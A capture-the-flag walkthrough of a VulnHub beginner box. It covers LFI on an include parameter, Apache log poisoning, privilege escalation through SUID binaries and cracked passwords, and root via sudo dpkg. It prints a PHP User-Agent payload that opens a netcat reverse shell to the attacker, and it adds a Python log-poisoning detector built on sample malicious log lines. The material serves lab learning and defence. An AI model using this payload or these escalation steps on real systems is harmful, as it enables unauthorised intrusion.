In this article we are going to solve another boot2root challenge. This is a beginner-level challenge. The box can be downloaded from VulnHub.
As usual, we first find the IP address of the target with the command: sudo netdiscover -i wlan0
Then, using nmap -A 192.168.43.45, we checked for open ports and the services running on the system.
Only two ports are open, so we decided to enumerate the HTTP service. The website shows a very cool image saying the website is closed, so we enumerated further with a directory brute force, using the command: sudo dirb http://192.168.43.45
We then opened every discovered webpage one by one.
This file has three entries, and we opened each of them. The webpage /?include=info turned out to be vulnerable to LFI.
We tried reading various files on the system in search of something useful, but found nothing. Since this is an LFI vulnerability, we can use a log poisoning attack and from there obtain a reverse shell.
But to perform a log poisoning attack we must be able to include a log file such as access.log or auth.log, so we ran the directory brute force again using DirBuster with the php extension and found the webpage /log.php.
We opened this page and found a very interesting file path in its very first line.
Now we have the path of the access.log file, and from here we can perform the log poisoning attack!
Next we opened the file /var/www/html/access.log through the LFI vulnerability.
We intercept the request with Burp Suite; to perform the log poisoning attack we tamper with the User-Agent header and inject our code there.
As we can see here, to get a reverse shell we injected our PHP code into the User-Agent header, and now we have the reverse shell.
code : <?php echo shell_exec('nc -e /bin/bash <your ip> <open port>'); ?>
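From the defender's side, the attack above leaves a clear trace: a PHP open tag inside a client-controlled log field (User-Agent, Referer or the request line) and requests that pull a log file or use ../ through the include parameter. The following added example, written for this article and not part of the original walkthrough, is a small detector that sweeps Apache combined-format access-log lines for exactly those indicators; the sample log lines are constructed.

```python
import re

# Constructed sample access-log lines in Apache "combined" format (not taken from the page).
# The third line carries a PHP tag in the User-Agent, which is what a log-poisoning attempt
# looks like from the server's side; the second line is a plain path-traversal probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?include=info HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?include=../../../../etc/passwd HTTP/1.1" 200 1890 "-" "curl/7.88.1"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?include=/var/www/html/access.log HTTP/1.1" 200 40211 "-" "<?php phpinfo(); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators: PHP open tags in any client-controlled field, ../ traversal (raw or URL-encoded)
# in the request line, and direct references to a log file in the request line.
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)
TRAVERSAL = re.compile(r'(\.\./|%2e%2e%2f|%2e%2e/|\.\.%2f)', re.IGNORECASE)
LOG_INCLUDE = re.compile(r'\b(access|error|auth)\.log\b', re.IGNORECASE)


def analyze(log_text):
    """Return one finding per suspicious line: {'ip', 'ts', 'reasons', 'line'}."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the whole sweep
        req, ua, ref = m.group('req'), m.group('ua'), m.group('ref')
        reasons = []
        if PHP_TAG.search(ua) or PHP_TAG.search(ref) or PHP_TAG.search(req):
            reasons.append('php_tag')
        if TRAVERSAL.search(req):
            reasons.append('traversal')
        if LOG_INCLUDE.search(req):
            reasons.append('log_include')
        if reasons:
            findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'reasons': reasons, 'line': line})
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {','.join(f['reasons'])}")
```

Any hit on php_tag means the log file is already poisoned and should be rotated, while the durable fix for the include page itself is to map the include parameter onto an allowlist of page names instead of passing it to include().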
Now that we have our reverse shell, we use the Python one-liner to get a proper interactive shell.
Now for the privilege escalation part.
Typing ls lists the files in this directory, among which we found an interesting file, secret.php. Using cat secret.php we checked its content and found the password of user victor as an MD5 hash; we cracked it and found the password to be irminsul.
Now we are in as user victor. We checked our privileges with sudo -l, but nothing was there, so we checked for SUID binaries using the command: find / -perm -u=s -type f 2>/dev/null
/home/victor/bin/find is very helpful for us, so we change our directory to /home/victor/bin/find.
As described on GTFOBins, this can be used for privilege escalation. We use the GTFOBins trick and we are in as user john.
We change our directory to /home/john, where we found a file named .private; its content is the text dropbox2010.
We use this as the password for user lisa and successfully log in as lisa.
We check for SUID binaries again with the same command, and again there is an interesting binary inside the directory /home/lisa/bin/.
There are many methods for privilege escalation using the copy binary, but here we succeeded with the following method:
1. Change directory to /tmp.
2. Create two files, id_rsa.pub and id_rsa.
3. Use ssh-keygen to generate a new key pair.
4. Copy id_rsa.pub to /home/henri/.ssh/authorized_keys.
5. Connect over SSH as user henri using the id_rsa file.
So we copy id_rsa.pub to /home/henri/.ssh/authorized_keys, change the permissions of id_rsa with the command chmod 400 id_rsa, and then connect over SSH as user henri.
We are in as henri. We checked this user's home directory and found two things.
The dust directory was empty, so we checked for SUID binaries again and found this.
We change our directory to /usr/local/bin, where the SUID binary owned by root is located. We execute it with ./cmd and we are in as user trevor.
This time, checking the user's privileges with sudo -l gave a very interesting result.
We again consulted GTFOBins and found that this can be used for privilege escalation to get a root shell!
We need the package x_1.0_all.deb to install, so we build this .deb package on our Kali Linux machine and transfer it to the target machine.
We downloaded this package onto the target machine using wget.
Now we install the package with the command sudo -u root /usr/bin/dpkg -i x_1.0_all.deb, and we are in as user root!
Finally, we read the final flag by executing this command.
Yippee!! The challenge is finally completed!
NOTE: This is the intended way to solve this machine. A second method is to brute-force the password of user trevor and then follow the dpkg part to get root the easy way, but following the first approach is much more instructive.
If we follow the approach described in this article, I would rate this machine as intermediate level for a beginner in CTF challenges, because there are many things to learn about privilege escalation.